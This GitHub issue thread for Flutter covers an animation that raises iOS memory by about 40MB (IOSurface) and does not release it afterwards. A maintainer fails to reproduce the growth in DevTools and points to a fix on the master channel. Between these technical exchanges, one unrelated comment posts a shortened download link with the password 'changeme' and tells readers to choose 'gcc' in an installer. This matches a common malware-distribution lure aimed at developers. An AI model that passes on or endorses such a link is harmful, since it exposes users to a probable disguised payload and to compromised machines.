### ISSUE TITLE
A simple animation caused an increase  nearly 40MB in iOS memory 

### ISSUE THREAD

**Issue by cj3479** [flutter/flutter#154187]
### Steps to reproduce

I play a  simple animation by clicking  the '+'  button, it increases  nearly 40MB  Memory in iOS 
About increased from 45MB to 95MB
And When I dismiss the animation by clicking the '+'  button again, the growing  40MB  still exist

### Expected results

Why increases much memory and Why  not decreasing the memory when i dismiss it ?
I Expecte animation cost more memory and  increasing 40MB memory can be removed when the animation dismiss

### Actual results

Why increases much memory?

### Code sample

The code simple is zip below

[flutter_office_demo.zip](https://github.com/user-attachments/files/16766070/flutter_office_demo.zip)

### Screenshots or Video

https://github.com/user-attachments/assets/412aa83e-495d-4ada-878f-c5b2d86c4283

![QQ_1724777068321](https://github.com/user-attachments/assets/3f0126d1-5f1c-4ce0-a97d-d345c3ef3450)

### Logs

<details open><summary>Logs</summary>

```console
[Paste your logs here]
```

</details>

### Flutter Doctor output

[!] Flutter (Channel [user-branch], 3.22.2, on macOS 14.3 23D56 darwin-x64, locale zh-Hans-CN)
    ! Flutter version 3.22.2 on channel [user-branch]

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by huycozy** [comment]
Hi @cj3479 
I checked this on the latest Flutter stable 3.24.1 but couldn't see the memory rising much from Devtools. How do you observe the memory? Can you try using the latest Flutter stable or master versions and confirm?

**Comment by cj3479** [comment]
> Hi @cj3479 I checked this on the latest Flutter stable 3.24.1 but couldn't see the memory rising much from Devtools. How do you observe the memory? Can you try using the latest Flutter stable or master versions and confirm?

Can you try xcode memory tools and check the memory rising?

**Comment by cj3479** [comment]
> Hi @cj3479 I checked this on the latest Flutter stable 3.24.1 but couldn't see the memory rising much from Devtools. How do you observe the memory? Can you try using the latest Flutter stable or master versions and confirm?

I try it on the latest Flutter stable 3.24.1 ,it still increases nearly 40MB Memory, you can iOS Memory tool and check it

Most memory is iOSurface.

<img width="2270" alt="image" src="https://github.com/user-attachments/assets/99c643ce-860c-49e3-ac74-6fbdc04531cf">

**Comment by cj3479** [comment]
> Here is the result on my end when running iOS module in XCode in profile mode with `iPhone 7, iOS 15.8` device. Memory decreases after I dismiss the page running animation with CircularProgressIndicator.
> 
> ![Screenshot 2024-08-29 at 13 02 48](https://private-user-images.githubusercontent.com/104349824/362551484-34aa38ea-3347-4f43-bee7-0d3e801be5a0.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ5MjYyMjUsIm5iZiI6MTcyNDkyNTkyNSwicGF0aCI6Ii8xMDQzNDk4MjQvMzYyNTUxNDg0LTM0YWEzOGVhLTMzNDctNGY0My1iZWU3LTBkM2U4MDFiZTVhMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI5JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyOVQxMDA1MjVaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iZWViODYwN2EwMGIyNDRmNmI1OWNmNjRmZjk2OGMyODI3ZmE1NWQ4MDAzNDk1ZGMxMGUyZWJjYzFmNjRjMGU4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.0UWeDPKMKdcickGTIyJUE2O9BH2Wfn97SybK5rwjlho)
> 
> Which device are you checking on? Can you try more times (navigate pages forth and back) to see if memory keeps increasing or not?

1. I use release mode with "iPhone 7 Plus  iOS 15.3.1 "  and I user the command "flutter build ios --no-simulator --release" 
to generate the Runner.app, then user the command "ideviceinstaller -i  Runner.app" to install it to device

2. Can you try the demo "flutter_office_demo.zip"  I posted above? I very am sure You will encounter the same memory issues as I did. And It is easy to reproduce When you use  ehe demo "flutter_office_demo.zip"  I posted above

This is My test result 
<img width="918" alt="558dd8ea37ad07dee9b4d400cfc163a2" src="https://github.com/user-attachments/assets/f4a89024-32f0-4794-836a-fea8eb8e7b1a">

I have two questions
1. Why animation  increases nearly much Memory ?
2. Why Memory doesn't  decreases after the animation dismiss?


Below is my flutter info:
Flutter 3.24.1 • channel stable • https://github.com/flutter/flutter.git
Framework • revision 5874a72aa4 (9 天前) • 2024-08-20 16:46:00 -0500
Engine • revision c9b9d5780d
Tools • Dart 3.5.1 • DevTools 2.37.2

**Comment by huycozy** [comment]
>Can you try the demo "flutter_office_demo.zip" I posted above? I am very sure You will encounter the same memory issues as I did. And It is easy to reproduce When you use ehe demo "flutter_office_demo.zip" I posted above

I did check this with your provided sample code and the result as my above comment. 

I just also checked this on Flutter master channel and saw the memory is reduced to normal after returning to previous page (stop animation), seems to be fixed by https://github.com/flutter/flutter/commit/47302c6ffe0baa12622e9390bd249e0e583cb7cd (this commit has not landed on stable yet but is already on beta or master), please switch to beta or master and confirm this on your end. Thanks!

**Comment by cj3479** [comment]
> > Can you try the demo "flutter_office_demo.zip" I posted above? I am very sure You will encounter the same memory issues as I did. And It is easy to reproduce When you use ehe demo "flutter_office_demo.zip" I posted above
> 
> I did check this with your provided sample code and the result as my above comment.
> 
> I just also checked this on Flutter master channel and saw the memory is reduced to normal after returning to previous page (stop animation), seems to be fixed by [47302c6](https://github.com/flutter/flutter/commit/47302c6ffe0baa12622e9390bd249e0e583cb7cd) (this commit has not landed on stable yet but is already on beta or master), please switch to beta or master and confirm this on your end. Thanks!

My provided sample code has not navigation.  It has only one page
I have another question  whether you can see the  increases nearly much Memory ?
 why much memory ? These memory blocks all belong to IOSurface memory

**Comment by huycozy** [comment]
>My provided sample code has not navigation. It has only one page

You are right, it's one page only. What I meant is to turn on or off CircularProgressIndicator widget to see it going. But I confirm I ran your source code and see it improved on Flutter master channel, could you please confirm it on your end?

>I have another question whether you can see the increases nearly much Memory ?
why much memory ? These memory blocks all belong to IOSurface memory

We need to verify the issue first, please take a look at our [Triage process](https://github.com/flutter/flutter/blob/master/docs/triage/README.md).
